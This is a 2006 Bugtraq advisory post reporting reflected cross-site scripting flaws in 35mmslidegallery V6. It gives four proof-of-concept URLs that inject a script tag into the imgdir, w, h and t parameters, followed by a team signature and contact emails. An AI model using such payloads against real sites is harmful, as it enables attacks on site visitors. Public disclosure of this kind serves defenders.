Bugtraq mailing list archives

multiple Xss exploits in 35mmslidegallery V6


From: "black code" <black-cod3 () hotmail com>
Date: Tue, 13 Jun 2006 14:09:22 +0300

multiple Xss exploits in 35mmslidegallery V6

forum type : 35mmslidegallery V6
bug found by : black-code
team : $!T3-D0WN
type : Xss

####################################################
exploits :

http://example.com/lumet/album/index.php?imgdir=&apos;><script>alert(10)</script>

http://example.comr/lumet/album/popup.php?w=&apos;><script>alert(10)</script>

http://example.com/lumet/album/popup.php?h=&apos;><script>alert(10)</script>

http://example.com/lumet/album/popup.php?t=&apos;><script>alert(10)</script>


####################################################



#######################
emails:

black-cod3 () hotmail com & gamr-14 () hotmail com & v8f3 () hotmail com
#######################


All my respect to our friends , lezr.com , g123g.net


done .. peace

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/


Current thread: